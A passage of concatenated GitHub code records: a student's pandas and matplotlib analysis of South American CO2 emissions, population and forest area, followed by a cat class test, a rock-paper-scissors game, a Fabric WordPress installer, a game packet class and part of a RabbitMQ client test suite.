resetting the index\r\nsa_co2_df.reset_index(level = 0,\r\n inplace = True)\r\n\r\n# the column had wrong name so have to rename\r\nsa_co2_df.rename(columns = {\"index\": \"Year\"},\r\n inplace = True)\r\n\r\n# plot\r\nfig4 = sa_co2_df.plot(kind = 'area',\r\n legend = True,\r\n figsize = (15, 8),\r\n colormap = 'plasma')\r\naxs4 = plt.subplot()\r\n\r\n# adding on extra things to the plot\r\nplt.xticks(range(0,len(sa_co2_df.Year.values)), sa_co2_df.Year.values)\r\nplt.xticks(rotation = 90)\r\nplt.xlabel('Year',\r\n fontsize = 20)\r\nplt.ylabel('CO2 Emissions (kt per million)',\r\n fontsize = 20)\r\nplt.legend(fontsize = 15)\r\n\r\n# show the graph\r\nplt.show()\r\n\r\n# saving the figure\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure4.png')\r\n\r\n\r\n\"\"\" Stacked area map of Population \"\"\"\r\n\r\n# transposing data for ease of manipulation\r\nsa_pop_df = sa_df2.set_index('Country Name').transpose()\r\nsa_pop_df.reset_index(level = 0,\r\n inplace = True)\r\nsa_pop_df.rename(columns = {\"index\": \"Year\"},\r\n inplace = True)\r\n\r\nlabels = sa_co2_df['Year']\r\n\r\n# define plot and axis \r\nfig5 = sa_pop_df.plot(kind = 'area',\r\n legend = True,\r\n figsize = (15, 8),\r\n colormap = 'plasma')\r\naxs5 = plt.subplot()\r\n\r\n# adding extra things for visualisation\r\nplt.xticks(range(0,len(sa_pop_df.Year.values)), sa_pop_df.Year.values)\r\nplt.xticks(rotation = 90)\r\nplt.xlabel('Year',\r\n fontsize = 20)\r\nplt.ylabel('Population (per 100 million)',\r\n fontsize = 20)\r\nplt.legend(fontsize = 15)\r\n\r\n# show the graph\r\nplt.show()\r\n\r\n# saving the figure\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure5.png')\r\n\r\n\r\n\"\"\" Line Plot of CO2 Production \"\"\"\r\n\r\n# copying CO2 dataset so not override previous versions\r\nsa_df3 = sa_df.copy()\r\n\r\n# transposing the data\r\nsa_df3 = sa_df3.set_index('Country Name').transpose()\r\n\r\n# resetting the index\r\nsa_df3.reset_index(level = 0,\r\n inplace = True)\r\n\r\n# the first column had no name so now naming it to access it\r\nsa_df3.rename(columns = {\"index\": \"Year\"},\r\n inplace = True)\r\n\r\n# defining plot \r\nfig6 = sa_df3.plot(kind = 'line',\r\n legend = True,\r\n figsize = (15, 8),\r\n colormap = 'plasma')\r\n\r\n# adding extra items for visualisation\r\nplt.xticks(range(0,len(sa_df3.Year.values)), sa_df3.Year.values)\r\nplt.xticks(rotation = 90)\r\nplt.xlabel('Year',\r\n fontsize = 20)\r\nplt.ylabel('CO2 Emissions (kt)',\r\n fontsize = 20)\r\nplt.legend(fontsize = 15)\r\n\r\n# show the plot\r\nplt.show()\r\n\r\n# saving the figure\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure6.png')\r\n\r\n\r\n\"\"\" Line Plot of Population \"\"\"\r\n\r\n# define new plot \r\nfig7 = sa_pop_df.plot(kind = 'line', \r\n linestyle = 'dashed',\r\n legend = True,\r\n figsize = (15, 8),\r\n colormap = 'plasma',\r\n layout = 'tight')\r\n\r\n# adding extra things to fig7 for visualisation\r\nplt.xticks(range(0,len(sa_pop_df.Year.values)), sa_pop_df.Year.values)\r\nplt.xticks(rotation = 90)\r\nplt.xlabel('Year',\r\n fontsize = 20)\r\nplt.ylabel('Population (per 100 million)',\r\n fontsize = 20)\r\nplt.legend(fontsize = 15)\r\n\r\n# show the graph\r\nplt.show()\r\n\r\n# saving the figure\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure7.png')\r\n\r\n\r\n\r\n\"\"\"\" Correlation Analysis between Indicators \"\"\"\r\n\r\n\r\n\"\"\" Correlation Figure on the two datasets (for visualisation) \"\"\"\r\n\r\n# plot correlation matrix of SA CO2 dataframe\r\nplt.figure(figsize = (15, 8))\r\nplt.matshow(sa_co2_df.corr())\r\nplt.title(\"Correlation between South American CO2 emissions\")\r\nprint(\"Correlation =\", '\\n', sa_co2_df.corr())\r\n\r\n#plotting colorbar\r\ncb = plt.colorbar()\r\ncb.ax.tick_params(labelsize = 14)\r\n\r\n# showing the plot\r\nplt.show()\r\n\r\n# saving the figure\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure8.png')\r\n\r\n\r\n\r\n# plot correlation matrix of SA Population dataframe\r\nplt.figure(figsize = (15, 8))\r\nplt.matshow(sa_pop_df.corr())\r\nplt.title(\"Correlation between South American Population\")\r\nprint(\"Correlation =\", '\\n', sa_co2_df.corr())\r\n\r\n#plotting colorbar\r\ncb = plt.colorbar()\r\ncb.ax.tick_params(labelsize = 14)\r\n\r\nplt.show()\r\n\r\n# saving the figure\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure9.png')\r\n\r\n\r\n\r\n\"\"\" Manipulation of CO2 emission \"\"\"\r\n\r\n#Identifying rows to use \r\narg_row = df.loc[df['Country Name'] == 'Argentina']\r\nbra_row = df.loc[df['Country Name'] == 'Brazil']\r\nper_row = df.loc[df['Country Name'] == 'Peru']\r\nuru_row = df.loc[df['Country Name'] == 'Uruguay']\r\nbol_row = df.loc[df['Country Name'] == 'Bolivia']\r\nchil_row = df.loc[df['Country Name'] == 'Chile']\r\ncol_row = df.loc[df['Country Name'] == 'Colombia']\r\nven_row = df.loc[df['Country Name'] == 'Venezuela']\r\necu_row = df.loc[df['Country Name'] == 'Ecuador']\r\nguy_row = df.loc[df['Country Name'] == 'Guyana']\r\npar_row = df.loc[df['Country Name'] == 'Paraguay']\r\nsur_row = df.loc[df['Country Name'] == 'Suriname']\r\n\r\n'''\r\nthe following code for CO2 emissions and Population follow:\r\n 1. country_values = identifying the cells in the row \r\n (values of each variable)\r\n 2. country_list = making the values into a numpy list \r\n 3. country_list = flatterning the values into a 1D array\r\n'''\r\n\r\narg_values = arg_row.iloc[0:, 1:]\r\narg_list = np.array(arg_values.values.tolist())\r\narg_list = np.ndarray.flatten(arg_list)\r\n\r\nbra_values = bra_row.iloc[0:, 1:]\r\nbra_list = np.array(bra_values.values.tolist())\r\nbra_list = np.ndarray.flatten(bra_list)\r\n\r\nper_values = per_row.iloc[0:, 1:]\r\nper_list = np.array(per_values.values.tolist())\r\nper_list = np.ndarray.flatten(per_list) \r\n\r\nuru_values = uru_row.iloc[0:, 1:]\r\nuru_list = np.array(uru_values.values.tolist())\r\nuru_list = np.ndarray.flatten(uru_list) \r\n\r\nbol_values = bol_row.iloc[0:, 1:]\r\nbol_list = np.array(bol_values.values.tolist())\r\nbol_list = np.ndarray.flatten(bol_list)\r\n\r\nchil_values = chil_row.iloc[0:, 1:]\r\nchil_list = np.array(chil_values.values.tolist())\r\nchil_list = np.ndarray.flatten(chil_list)\r\n\r\ncol_values = col_row.iloc[0:, 1:]\r\ncol_list = np.array(col_values.values.tolist())\r\ncol_list = np.ndarray.flatten(col_list) \r\n\r\nven_values = ven_row.iloc[0:, 1:]\r\nven_list = np.array(ven_values.values.tolist())\r\nven_list = np.ndarray.flatten(ven_list) \r\n\r\npar_values = par_row.iloc[0:, 1:]\r\npar_list = np.array(par_values.values.tolist())\r\npar_list = np.ndarray.flatten(par_list)\r\n\r\nguy_values = guy_row.iloc[0:, 1:]\r\nguy_list = np.array(guy_values.values.tolist())\r\nguy_list = np.ndarray.flatten(guy_list)\r\n\r\nsur_values = sur_row.iloc[0:, 1:]\r\nsur_list = np.array(sur_values.values.tolist())\r\nsur_list = np.ndarray.flatten(sur_list) \r\n\r\necu_values = ecu_row.iloc[0:, 1:]\r\necu_list = np.array(ecu_values.values.tolist())\r\necu_list = np.ndarray.flatten(ecu_list) \r\n\r\n\r\n\"\"\" Manipulation of Population dataframe \"\"\"\r\n\r\narg_row2 = df2.loc[df['Country Name'] == 'Argentina']\r\nbra_row2 = df2.loc[df['Country Name'] == 'Brazil']\r\nper_row2 = df2.loc[df['Country Name'] == 'Peru']\r\nuru_row2 = df2.loc[df['Country Name'] == 'Uruguay']\r\nbol_row2 = df2.loc[df['Country Name'] == 'Bolivia']\r\nchil_row2 = df2.loc[df['Country Name'] == 'Chile']\r\ncol_row2 = df2.loc[df['Country Name'] == 'Colombia']\r\nven_row2 = df2.loc[df['Country Name'] == 'Venezuela']\r\necu_row2 = df2.loc[df['Country Name'] == 'Ecuador']\r\nguy_row2 = df2.loc[df['Country Name'] == 'Guyana']\r\npar_row2 = df2.loc[df['Country Name'] == 'Paraguay']\r\nsur_row2 = df2.loc[df['Country Name'] == 'Suriname']\r\n\r\narg_values2 = arg_row2.iloc[0:, 1:]\r\narg_list2 = np.array(arg_values2.values.tolist())\r\narg_list2 = np.ndarray.flatten(arg_list2)\r\n\r\nbra_values2 = bra_row2.iloc[0:, 1:]\r\nbra_list2 = np.array(bra_values2.values.tolist())\r\nbra_list2 = np.ndarray.flatten(bra_list2)\r\n\r\nper_values2 = per_row2.iloc[0:, 1:]\r\nper_list2 = np.array(per_values2.values.tolist())\r\nper_list2 = np.ndarray.flatten(per_list2) \r\n\r\nuru_values2 = uru_row2.iloc[0:, 1:]\r\nuru_list2 = np.array(uru_values2.values.tolist())\r\nuru_list2 = np.ndarray.flatten(uru_list2)\r\n\r\nbol_values2 = bol_row2.iloc[0:, 1:]\r\nbol_list2 = np.array(bol_values2.values.tolist())\r\nbol_list2 = np.ndarray.flatten(bol_list2)\r\n\r\nchil_values2 = chil_row2.iloc[0:, 1:]\r\nchil_list2 = np.array(chil_values2.values.tolist())\r\nchil_list2 = np.ndarray.flatten(chil_list2)\r\n\r\ncol_values2 = col_row2.iloc[0:, 1:]\r\ncol_list2 = np.array(col_values2.values.tolist())\r\ncol_list2 = np.ndarray.flatten(col_list2) \r\n\r\nven_values2 = ven_row2.iloc[0:, 1:]\r\nven_list2 = np.array(ven_values2.values.tolist())\r\nven_list2 = np.ndarray.flatten(ven_list2) \r\n\r\npar_values2 = par_row2.iloc[0:, 1:]\r\npar_list2 = np.array(par_values2.values.tolist())\r\npar_list2 = np.ndarray.flatten(par_list2)\r\n\r\nguy_values2 = guy_row2.iloc[0:, 1:]\r\nguy_list2 = np.array(guy_values2.values.tolist())\r\nguy_list2 = np.ndarray.flatten(guy_list2)\r\n\r\nsur_values2 = sur_row2.iloc[0:, 1:]\r\nsur_list2 = np.array(sur_values2.values.tolist())\r\nsur_list2 = np.ndarray.flatten(sur_list2) \r\n\r\necu_values2 = ecu_row2.iloc[0:, 1:]\r\necu_list2 = np.array(ecu_values2.values.tolist())\r\necu_list2 = np.ndarray.flatten(ecu_list2) \r\n\r\n\r\n\"\"\" Correlation for the countries in South America \"\"\"\r\n\r\nprint('ARGENTINA: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(arg_list, arg_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(arg_list, arg_list2)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\nprint('BRAZIL: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(bra_list, bra_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(bra_list, bra_list2)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\nprint('PERU: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(per_list, per_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(per_list, per_list2)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\nprint('URUGUAY: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(uru_list, uru_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(uru_list, uru_list2)\r\nprint(f'spearman rank test: r={c}, p={c}')\r\n\r\nprint('BOLIVIA: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(bol_list, bol_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(bol_list, bol_list2)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\nprint('CHILE: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(chil_list, chil_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(chil_list, chil_list2)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\nprint('COLOMBIA: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(col_list, col_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(col_list, col_list2)\r\nprint(f'spearman rank test: r={c}, p={c}')\r\n\r\nprint('VENEZUELA: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(ven_list, ven_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(ven_list, ven_list2)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\nprint('ECUADOR: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(ecu_list, ecu_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(ecu_list, ecu_list2)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\nprint('GUYANA: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(guy_list, guy_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(guy_list, guy_list2)\r\nprint(f'spearman rank test: r={c}, p={c}')\r\n\r\nprint('PARAGUAY: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(par_list, par_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(par_list, par_list2)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\nprint('SURINAME: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(sur_list, sur_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(sur_list, sur_list2)\r\nprint(f'spearman rank test: r={c}, p={c}')\r\n\r\n\r\n\r\n\"\"\" Experimenting with Interpolation \"\"\"\r\n\r\n'''\r\nwhy? because the data I selected unfortunately did not have\r\nany NA/ missing values therefore, I still wanted to ensure\r\nI knew how to perform interpolation and thus, selected a \r\nnew dataset that I observed to have several NA values.\r\n'''\r\n\r\ndf3 = pd.read_csv('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/forest area.csv',\r\n header = 4, # it removes the top 4 lines of jargon as its not data\r\n engine = \"python\")\r\n\r\n# renaming a column\r\ndf3.loc[254, 'Country Name'] = \"Venezuela\"\r\n\r\n# removing unwanted columns\r\ndf3.drop(['Country Code', 'Indicator Name', 'Indicator Code'],\r\n axis = 1,\r\n inplace = True)\r\n\r\n# subsetting the data\r\nsa_df3 = df3[(df3['Country Name'] == 'Argentina') |\r\n (df3['Country Name'] == 'Bolivia') |\r\n (df3['Country Name'] == 'Brazil') |\r\n (df3['Country Name'] == 'Chile') |\r\n (df3['Country Name'] == 'Colombia') |\r\n (df3['Country Name'] == 'Ecuador') |\r\n (df3['Country Name'] == 'Guyana') |\r\n (df3['Country Name'] == 'Paraguay') |\r\n (df3['Country Name'] == 'Peru') |\r\n (df3['Country Name'] == 'Suriname') |\r\n (df3['Country Name'] == 'Uruguay') |\r\n (df3['Country Name'] == 'Venezuela')]\r\n\r\n# resetting the index \r\nsa_df3.reset_index(inplace = True,\r\n drop = True)\r\n\r\n\r\n\"\"\" Summary statistics of the Forest Area Dataset \"\"\"\r\n\r\n# performing pre-processing and basic statistics using functions\r\n#print(pre_processing(sa_for_df))\r\n\r\n\r\n\"\"\" Shapiro-Wilk test for normality on SA Forest Area dataset \"\"\"\r\n\r\n# copying the dataset\r\nsa_for_df1 = sa_df3.copy()\r\nprint(sa_for_df1.head())\r\n\r\nfrom scipy.stats import shapiro\r\n\r\n# performing shapiro-wilk test\r\nshapiro_test3 = (sa_for_df1.groupby('Country Name')\r\n .apply(lambda x: pd.Series(shapiro(x), index = ['W', 'P'])))\r\n\r\n# printing the results of the test to the console\r\nprint(shapiro_test3)\r\n\r\n'''\r\nCountries accept null hypothesis: \r\n Bolivia, Colombia, Ecuador, Paraguay, Peru, \r\n Uruguay, and Venezuela\r\n(countries are normality distributed across the years)\r\n\r\nCountries reject null hypothesis: \r\n Argentina, Brazil, Chile, Guyana, and Suriname\r\n(countries are not normality distributed across the years)\r\n'''\r\n\r\n\r\n\"\"\" Skewness and Kurtosis on SA Population dataset \"\"\"\r\n\r\n# performing shapiro-wilk test\r\nskewness_test3 = (sa_for_df1.groupby('Country Name')\r\n .apply(lambda x: pd.Series(skew(x))))\r\n\r\nkurtosis_test3 = (sa_for_df1.groupby('Country Name')\r\n .apply(lambda x: pd.Series(kurtosis(x))))\r\n\r\n# printing the results of the test to the console\r\nprint(skewness_test3, '\\n', \r\n kurtosis_test3)\r\n\r\n\r\n\"\"\" Boxplot to look for outliers in each COUNTRY (over the years) \"\"\"\r\n\r\nsa_for_box = sa_for_df1.set_index('Country Name').transpose()\r\n\r\n# resetting the index\r\nsa_for_box.reset_index(level = 0,\r\n inplace = True)\r\n\r\n# the column had wrong name so have to rename\r\nsa_for_box.rename(columns = {\"index\": \"Year\"},\r\n inplace = True)\r\n\r\n# plotting the boxplot\r\nfig14 = sa_for_box.boxplot(rot = 45,\r\n fontsize = 10,\r\n grid = True,\r\n color = 'navy')\r\n\r\n# adding extra things for visualisation\r\nplt.title('The Forest Area of South American Countries')\r\nplt.ylabel('Forest Area (in millions)')\r\nplt.xlabel('Country')\r\n\r\n# show the graph\r\nplt.show()\r\n\r\n# saving the figure\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure14.png')\r\n\r\n'''\r\nfrom the boxplot there appears to have no outliers above \r\nor below the boxplots for the countries.\r\n'''\r\n\r\n\"\"\" Interpolation Manipulation \"\"\"\r\n\r\n# transposing data for ease of manipulation\r\nsa_for_df = sa_df3.set_index('Country Name').transpose()\r\n\r\n# resetting the matrix\r\nsa_for_df.reset_index(level = 0,\r\n inplace = True)\r\n\r\n# had no name so now naming it\r\nsa_for_df.rename(columns = {\"index\": \"Year\"},\r\n inplace = True)\r\n\r\n# copying the original data\r\nsa_for_df2 = sa_for_df.copy()\r\n\r\n# dropping any NA values\r\nsa_for_df2.dropna(axis = 0,\r\n inplace = True)\r\n\r\n# changing some values to NA in the dataset\r\nsa_for_df2['Argentina'].replace(['348388', '333780', '317960', '299906', '290970', '288990'], np.NaN,\r\n inplace = True)\r\n\r\n# copying the data for subplots\r\nsa_for_df3 = sa_for_df.copy()\r\nsa_for_df4 = sa_for_df.copy()\r\nsa_for_df5 = sa_for_df.copy()\r\n\r\n# performing interpolation on the SA country: Argentina\r\nsa_for_df3['Argentina'].interpolate(method = 'linear',\r\n limit_direction = 'backward',\r\n inplace = True)\r\nsa_for_df4['Argentina'].interpolate(method = 'nearest',\r\n limit_direction = 'backward',\r\n inplace = True)\r\nsa_for_df5['Argentina'].interpolate(method = 'cubic',\r\n limit_direction = 'backward',\r\n inplace = True)\r\n\r\n# defining figure and axis for plotting\r\nfig10, ax10 = plt.subplots(2,2,\r\n figsize = (16, 8),\r\n sharey = True,\r\n sharex = True)\r\n\r\n# plotting using subplots\r\nax10[0,0].plot(sa_for_df2['Year'],\r\n sa_for_df2['Argentina'],\r\n color = 'purple')\r\nax10[0,1].plot(sa_for_df3['Year'],\r\n sa_for_df3['Argentina'], \r\n color = 'pink')\r\nax10[1,0].plot(sa_for_df4['Year'],\r\n sa_for_df4['Argentina'], \r\n color = 'green')\r\nax10[1,1].plot(sa_for_df5['Year'],\r\n sa_for_df5['Argentina'], \r\n color = 'orange')\r\n\r\n# setting extras for visualisation of figure 10\r\nax10[0,0].set_ylabel('Forest Area')\r\nax10[1,0].set_ylabel('Forest Area')\r\n\r\n# rotating the x axis\r\nax10[1,0].tick_params(axis = 'x',\r\n labelrotation = 90)\r\nax10[1,1].tick_params(axis = 'x',\r\n labelrotation = 90)\r\n\r\n# set titles \r\nax10[0,0].set_title('Original Data')\r\nax10[0,1].set_title('Linear Interpolation')\r\nax10[1,0].set_title('K-Nearest Neighbour Interpolation')\r\nax10[1,1].set_title('Cubic Interpolation')\r\n\r\n# showing the figure\r\nplt.show()\r\n\r\n'''\r\ncubic interpolation appears to fit the data the best. \r\nTherefore, if i was using this data any further I would \r\napply the cubic interpolation for analysis/ comparative studies.\r\n'''\r\n\r\n# saving the figure\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure10.png')\r\n\r\n\r\n\"\"\" The END \"\"\"\r\n","repo_name":"sarahjaynebyrne/ADS1_assignment2","sub_path":"Final Code Version2.py","file_name":"Final Code Version2.py","file_ext":"py","file_size_in_byte":35421,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"20285645744","text":"from cat import Cat\ncat1 = Cat('Sam', 'мальчик', '10')\ncat2 = Cat('Aleks', 'мальчик', '5')\ncat3 = Cat('Niki', 'девочка', '3')\nCat = [(cat1.getname(), cat1.getgender(), cat1.getage()),\n (cat2.getname(), cat2.getgender(), cat2.getage()),\n (cat3.getname(), cat3.getgender(), cat3.getage())]\nprint(\"Список котов и кошек:\")\nfor cat in Cat:\n print(\",\".join(cat))\n\n","repo_name":"marinessa1/practice-module16","sub_path":"testCat.py","file_name":"testCat.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38172020731","text":"'''\nCreated on Sep 27, 2018\n\n@author: ITAUser\n'''\n#testme\nkeepPlaying = True\nwhile(keepPlaying):\n# '''Welcomes the player and tells the the rules'''\n print(\"Welcome to Rock Paper Scissors!\")\n print(\"Best two out of three. Press 'q' to quit\")\n \n# '''\n# 1 = Rock\n# 2 = Scissors\n# 3 = Paper \n# '''\n \n# '''imports the 'random' functon, which selects random values in a given range'''\n import random\n \n# '''sets each player's initial score to zero'''\n cpuScore = 0\n humanScore = 0\n \n# '''loop that repeats each round until the human or cpu score 2 points'''\n while(humanScore < 2 and cpuScore < 2):\n \n# '''assigns the variable 'cpuChoice' a random integer between 1 and 3'''\n cpuChoice = random.randint(1,3)\n \n# '''prompts the user to input their choice of rock, paper, or scissors'''\n choice = input(\"Please choose(Rock, Paper, Scissors): \")\n \n# '''checks is the user quits'''\n if( (choice == 'q') or (choice == 'Q') ):\n keepPlaying = False\n break\n \n# '''checks if it's a draw'''\n elif((choice.lower() == 'rock' and cpuChoice == 1)\n or (choice.lower() == 'scissors' and cpuChoice == 2) \n or (choice.lower() == 'paper' and cpuChoice == 3)):\n print(\"DRAW\")\n print (\"Human:\" + str(humanScore) , \"CPU:\" + str(cpuScore))\n \n \n# '''checks if human wins''' \n elif((choice.lower() == 'rock' and cpuChoice == 2) \n or (choice.lower() == 'scissors' and cpuChoice == 3) \n or (choice.lower() == 'paper' and cpuChoice == 1)):\n humanScore = humanScore + 1\n print (\"Human:\" + str(humanScore) , \"CPU:\" + str(cpuScore))\n \n# \n# '''checks if CPU wins'''\n elif((choice.lower() == 'rock' and cpuChoice == 3) \n or (choice.lower() == 'scissors' and cpuChoice == 1) \n or (choice.lower() == 'paper' and cpuChoice == 2)):\n cpuScore = cpuScore + 1\n print (\"Human:\" + str(humanScore) , \"CPU:\" + str(cpuScore))\n\n else: \n print (\"Not a valid input, try again.\")\nprint (\"Thanks for playing!\")\nif(humanScore == 2):\n print(\"You WIN!!!!\")\nif(cpuScore == 2):\n print(\"You LOSE!!!\")\nprint (\"Human:\" + str(humanScore) , \"CPU:\" + str(cpuScore))\n","repo_name":"cmangeles2020/rockpaperscissor","sub_path":"rockPaperScissors.py","file_name":"rockPaperScissors.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24553637488","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis class is aim to install wordpress project in lnmp server(Linux, Nginx, Mysql and PHP) into your host.\n\nUsage:\n $ sudo pip install ezhost\n $ ezhost -s lnmp-wordpress -p news -H 127.0.0.1:2201 -U vagrant -P vagrant\n\nAuthor: Zhe Xiao\nGithub: https://github.com/zhexiao/ezhost.git\n\"\"\"\nfrom io import StringIO\n\n# fabric libs\nfrom fabric.colors import red, green\nfrom fabric.api import prompt, sudo, put\nfrom fabric.contrib.files import exists\nfrom fabric.state import output\nfrom fabric.context_managers import cd\n\nfrom ezhost.ServerCommon import ServerCommon\nfrom ezhost.ServerLnmp import ServerLnmp\n\n# hide exec command\noutput['running'] = False\n\n\nclass ServerLnmpWordpress(ServerCommon):\n\n def __init__(self, args, **kwargs):\n self.args = args\n self.project = self.args.project\n\n def install(self):\n # install lnmp server\n ServerLnmp(self.args).install()\n self.install_wordpress()\n\n def install_wordpress(self):\n if self.args.force or prompt(red(' * Install Wordpress (y/n)?'), default='y') == 'y':\n # create project web server config file if not exist\n with cd('/etc/nginx/sites-available'):\n if not exists(self.project):\n sudo('touch {0}'.format(self.project))\n\n # check the php version is php5 or php7\n try:\n sudo('php5-fpm -v')\n # save wordpress config\n put(StringIO(self.nginx_web_wordpress_config), self.project, use_sudo=True)\n except:\n sudo('php-fpm7.0 -v')\n # save wordpress config\n put(StringIO(self.nginx_php7_web_wordpress_config), self.project, use_sudo=True)\n\n # go to web root\n with cd(self.nginx_web_dir):\n # download latest wordpress, extract and change mode\n sudo('wget https://wordpress.org/latest.tar.gz')\n sudo('tar -zxvf latest.tar.gz')\n sudo('sudo chown -R www-data:www-data wordpress')\n\n # rename wordpress project\n sudo('mv wordpress {0}'.format(self.project))\n\n # create uploads folder\n sudo('mkdir {0}/wp-content/uploads'.format(self.project))\n sudo('chown -R www-data:www-data {0}/wp-content/uploads'.format(self.project))\n\n # go to nginx enabled config\n with cd('/etc/nginx/sites-enabled'):\n if exists(self.project):\n sudo('rm {0}'.format(self.project))\n\n # remove the default nginx config\n if exists('default'):\n sudo('rm default')\n\n # move project web server config file from avaiable to enable folder\n sudo('ln -s /etc/nginx/sites-available/{0} .'.format(self.project))\n\n # restart server\n try:\n sudo('service php5-fpm restart')\n except:\n sudo('service php7.0-fpm restart')\n sudo('service nginx restart')\n\n print(green(' * Installed Wordpress project {0} in the system.'.format(self.project)))\n\n print(green(' * Done'))\n print()\n\n def vagrant_workspace(self):\n if prompt(red(' * Are you working on the vagrant server (y/n)?'), default='y') == 'y':\n sudo('mv /var/www/html/ /vagrant/')\n sudo('cd /var/www/ && ln -s /vagrant/html/ .')\n","repo_name":"zhexiao/ezhost","sub_path":"ezhost/ServerLnmpWordpress.py","file_name":"ServerLnmpWordpress.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"2694686726","text":"from dataclasses import dataclass, field\n\nfrom game.packets.base import GameServerPacket\n\n\n@dataclass\nclass Snoop(GameServerPacket):\n type: Int8 = field(default=213, init=False, repr=False)\n conversation_id: Int32\n receiver: UTFString\n text_type: Int32\n speaker: UTFString\n message: UTFString\n\n def encode(self, session):\n encoded = self.type.encode()\n\n sorted_args = [\n self.conversation_id,\n self.receiver,\n Int32(0),\n self.text_type,\n self.speaker,\n self.message,\n ]\n for item in sorted_args:\n encoded.append(item)\n return encoded\n","repo_name":"L2py/L2py","sub_path":"game/game/packets/snoop.py","file_name":"snoop.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35404360430","text":"import asyncio\nimport logging\nimport platform\nimport typing\nfrom unittest import mock\nimport uuid\n\nfrom pamqp import commands, constants, frame, heartbeat\n\nfrom aiorabbit import channel0, exceptions, state, version\nfrom . import testing\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass TestCase(testing.AsyncTestCase):\n\n HEARTBEAT_INTERVAL = 10\n SERVER_HEARTBEAT_INTERVAL = 30\n MAX_CHANNELS = 256\n SERVER_MAX_CHANNELS = 32768\n\n def setUp(self):\n super().setUp()\n self.blocked = asyncio.Event()\n self.username = str(uuid.uuid4())\n self.password = str(uuid.uuid4())\n self.locale = str(uuid.uuid4())\n self.product = str(uuid.uuid4())\n self.virtual_host = '/'\n self.heartbeat = asyncio.Event()\n self.loop = asyncio.get_event_loop()\n self.on_remote_close = mock.Mock()\n self.server_properties = {\n 'capabilities': {'authentication_failure_close': True,\n 'basic.nack': True,\n 'connection.blocked': True,\n 'consumer_cancel_notify': True,\n 'consumer_priorities': True,\n 'direct_reply_to': True,\n 'per_consumer_qos': True,\n 'publisher_confirms': True},\n 'cluster_name': 'mock@{}'.format(str(uuid.uuid4())),\n 'platform': 'Python {}'.format(platform.python_version()),\n 'production': 'aiorabbit',\n 'version': version\n }\n self.transport = mock.create_autospec(asyncio.Transport)\n self.transport.write = self._transport_write\n self.channel0 = channel0.Channel0(\n self.blocked,\n self.username,\n self.password,\n self.virtual_host,\n self.HEARTBEAT_INTERVAL,\n self.locale,\n self.loop,\n self.MAX_CHANNELS,\n self.product,\n self.on_remote_close)\n\n def _connection_start(self):\n self.channel0.process(\n commands.Connection.Start(\n server_properties=self.server_properties))\n\n def _connection_tune(self):\n self.channel0.process(\n commands.Connection.Tune(\n self.SERVER_MAX_CHANNELS, constants.FRAME_MAX_SIZE,\n self.SERVER_HEARTBEAT_INTERVAL))\n\n def _connection_open_ok(self):\n self.channel0.process(commands.Connection.OpenOk())\n\n def _connection_close_ok(self):\n self.channel0.process(commands.Connection.CloseOk())\n\n def _transport_write(self, value: bytes) 